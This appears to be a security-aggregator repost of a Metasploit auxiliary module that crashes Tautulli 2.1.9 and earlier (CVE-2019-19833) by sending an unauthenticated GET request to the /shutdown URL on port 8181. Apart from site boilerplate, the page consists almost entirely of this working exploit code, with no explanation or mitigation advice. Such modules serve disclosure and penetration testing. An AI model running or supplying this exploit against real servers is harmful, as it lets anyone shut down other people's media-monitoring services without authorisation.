HackDig : Dig high-quality web security articles for hackers

Tautulli 2.1.9 Denial of Service

2020-01-19 23:20
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize    super(      'Name'        => 'Tautulli v2.1.9 - Shutdown Denial of Service',      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',      'Author'      => 'Ismail Tasdelen',      'License'     => MSF_LICENSE,      'References'  =>      [        ['CVE', '2019-19833'],        ['EDB', '47785']      ]    )    register_options([ Opt::RPORT(8181) ])  end  def run    res = send_request_raw({      'method' => 'GET',      'uri' => '/shutdown'    })    if res      print_status("Request sent to #{rhost}")    else      print_status("No reply from #{rhost}")    end  rescue Errno::ECONNRESET    print_status('Connection reset')  endend


Source: 0410100202-BLW/eussi/moc.ytirucesxc

Read:704 | Comments:0 | Tags:No Tag

“Tautulli 2.1.9 Denial of Service”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud